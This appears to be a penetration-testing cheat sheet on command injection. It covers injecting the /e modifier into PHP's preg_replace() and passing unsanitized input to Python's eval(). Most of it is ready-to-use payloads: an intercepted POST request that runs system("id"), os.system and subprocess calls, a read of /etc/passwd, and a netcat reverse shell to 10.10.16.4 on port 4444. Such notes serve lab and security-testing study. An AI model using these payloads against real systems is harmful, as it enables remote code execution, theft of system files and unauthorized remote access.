Command Injection

PHP - preg_replace()

• Used in PHP to perform regular expression-based replacements.

  • Syntax: preg_replace(pattern, replacement, subject);

  • If the /e modifier (or PREG_REPLACE_EVAL) is used, the replacement string can be executed as PHP code before the replacement occurs.

Attack Technique

• While the /e modifier may not be explicitly present in the original code, it can be injected into the regular expression pattern through user input.

• If user input is used directly in the preg_replace() function, attackers can manipulate requests to inject the /e modifier into the pattern, causing arbitrary PHP code execution.

• Look for regex patterns on POST requests (/)

• Some payload examples:

Intercepted POST request

pattern=%2Fx%2Fe&ipaddress=system("id")&text=x

Plain PHP

preg_replace(/x/e, system("id"), x)

Python - eval()

The vulnerability arises from unsanitized user input being passed to the eval() function.

Payloads

__import__('os').system('your_command_here')

Reverse Shell

__import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.4 4444 >/tmp/f')

Using subprocess

__import__('subprocess').call(['ls', '-la'])

File Operations

open('/etc/passwd').read()

Subprocess with Output Capture

__import__('subprocess').Popen('whoami', shell=True, stdout=__import__('subprocess').PIPE).communicate()[0]